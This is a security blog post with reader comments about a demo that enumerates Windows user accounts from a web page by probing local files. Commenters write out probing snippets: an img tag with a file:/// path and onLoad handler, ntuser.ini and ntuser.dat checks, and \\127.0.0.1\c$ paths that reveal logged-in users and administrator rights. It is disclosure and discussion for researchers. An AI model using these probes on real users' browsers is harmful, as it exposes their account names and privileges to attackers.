Cenzic 232 Patent
Paid Advertising
web application security lab

Enumerate Windows Users In JS

Sergey Vzloman is at it again… He sent over a really interesting piece of demo code (he tested it in IE6.0 and FF - I was only able to test it in Firefox) that enumerates users on Windows systems. Right now, as the code stands in his demo (with only minor tweaks from me) it only tries four accounts and is intentionally noisy to show what it’s doing, but it works pretty well Click here to see the demo.

Dan Veditz has already commented on this saying the resource:// issue is already fixed in 2.0.0.4 and 1.5.0.12 versions of Firefox. But for now and for previous versions, this will continue to work. It may be a little slow to enumerate users, but if you know it’s one of a few hundred combinations of a user’s name you can quickly enumerate through it.

Of course there are other ways to do this, like get them to connect to you through a file:///\\ URL as discussed before, but it’s good to have all of this documented since one or more of these may stop working. Nice work, Sergey!

14 Responses to “Enumerate Windows Users In JS”

  1. blah Says:

    This does not work for me in Firefox 2.0.0.3 or current IE6.

  2. RSnake Says:

    Weird, it works for me in 2.0.0.3. What OS are you using for Firefox? Did you make sure to have JS turned on?

  3. Ronald van den Heetkamp Says:

    I like the idea, pity it is very slow.

    But isn’t this the same as enumerating with a small image over this:
    [code]
    file:///C:/DOCUME~1/RSnake/My Documents/My Pictures/Sample Pictures/Sunset.jpg” onLoad=”alert(’Yes! RSnake is alive…’);”
    [/code]
    %3Cimg+src%3D%22file:///C:/DOCUME~1/RSnake/My+Documents/My+Pictures/Sample+Pictures/Sunset.jpg%22+onLoad%3D%22alert(’Yes!+RSnake+is+alive…’)%3B%22%3E

  4. Mephisto Says:

    Didn’t work for me in IE6 on a Win2k machine, but worked fine in Firefox 2.0.0.3 on same machine.

  5. Sergey Vzloman Says:

    re: R/ van den H/

    Yes, you can use images like file:///C:/…/Sample Pictures/Sunset.jpg
    And handle on(load/error) events to find out user profile. But i use Russian Windows where this image is placed to C:\Docume~1\(..USER..)\Документы\Мои рисунки\Образцы рисунков\Закат.jpg :) while “ntuser.ini” is located directly in C:\Docume~1\(..USER..)\

    re: Mephisto Says

    Probaby you have installed on IE debuger on error handling software. If this code is bugged and you be able to find out any positive fixies, please post its to me. After some of tests i found that this source can be patched to work in IE7 and Opera(Add timeout handlers for some cases).

    By the way if your account is not administrative on local/network domain here is no chances to read foreign ntuser.ini(Owned by other profile). Restricted user has no access to other’s profiles…
    In the present state this code may not work…. Just testing… Only triks :)

    I think, to brute loooong account names (like “ANY ACCOUNT 317″), at first you can find its short-name (ANYACC~1). First 6 letters known. Brute others… N :)
    Accounts “Administrator” and “Administrator_From_Hell” are different at one byte “Admini~1″ and “Admini~2″. If exists “Admini~1″, whiy not try “Admini~2″?…

  6. Sergey Vzloman Says:

    re: R/ van den H/

    Yes, you can use images like file:///C:/…/Sample Pictures/Sunset.jpg
    And handle on(load/error) events to find out user profile. But i use Russian Windows where this image is placed to C:\Docume~1\(..USER..)\Документы\Мои рисунки\Образцы рисунков\Закат.jpg :) while “ntuser.ini” is located directly in C:\Docume~1\(..USER..)\

    re: Mephisto Says

    Probaby you have installed on IE debuger on error handling software. If this code is bugged and you be able to find out any positive fixies, please post its to me. After some of tests i found that this source can be patched to work in IE7 and Opera(Add timeout handlers for some cases).

    By the way if your account is not administrative on local/network domain here is no chances to read foreign ntuser.ini(Owned by other profile). Restricted user has no access to other’s profiles…
    In the present state this code may not work…. Just testing… Only triks :)

    I think, to brute loooong account names (like “ANY ACCOUNT 317″), at first you can find its short-name (ANYACC~1). First 6 letters known. Brute others… N :)
    Accounts “Administrator” and “Administrator_From_Hell” are different at one byte “Admini~1″ and “Admini~2″. If exists “Admini~1″, whiy not try “Admini~2″?…

  7. Sergey Vzloman Says:

    On my firefox disallowed remote access to file:///c:/… through image tag. Therefore i used resource in Firefox and file protocol in IE.

  8. Ronald van den Heetkamp Says:

    @Sergey Vzloman Nice… very clever idea.

    Well, I’m not so interested in bruteforcing users, I rather tought about making a list with possible names of people I know. But the most interesting thing I guess is to detect if the user is logged in as Administrator. :)

  9. Kishor Says:

    Look at my comment on this page,
    http://www.gnucitizen.org/projects/pdf-strikes-back/

    I think this will tell you the correct user name (and that it has been fixed).

  10. Wladimir Palant Says:

    RSnake, web pages cannot load file:/// URLs in Firefox, I think this changed around Firefox 1.0 already. So anything involving file:/// URLs will not work there.

  11. Alex Says:

    This is the reason why I’ve always disabled JavaScript in Adobe.

  12. Sergey Vzloman Says:

    @Ronald van den Heetkamp

    I can helo you :)

    1. I if you detected user with name “ANY” through ntuser.ini try access to ntuser.dat. If file is loaded user is not currently logged, if you have not access to file, it is opened and logged user name is “ANY”.

    2. If you have acces to “c:/Doc…/ANY/ntuser.ini”, try “\\127.0.0.1\c$\doc..\ANY\ntuser.ini” if fule is opening you are administrator on Local System (Domain)

    Lets collect user names! I needed its too :)

  13. Sergey Vzloman Says:

    You can try file:///\\127.0.0.1\c$\boot.ini. In this case User name is unknown, but administrator privileges can be detected…

  14. Reiners Says:

    hi!
    just wanted to add that my old IE keeps crashing after I confirm the javascript popup.

    OS: WinXP, SP2, latest hotfixes
    IE: 6.0.2900.2180 SP2

    I thought that could be interesting …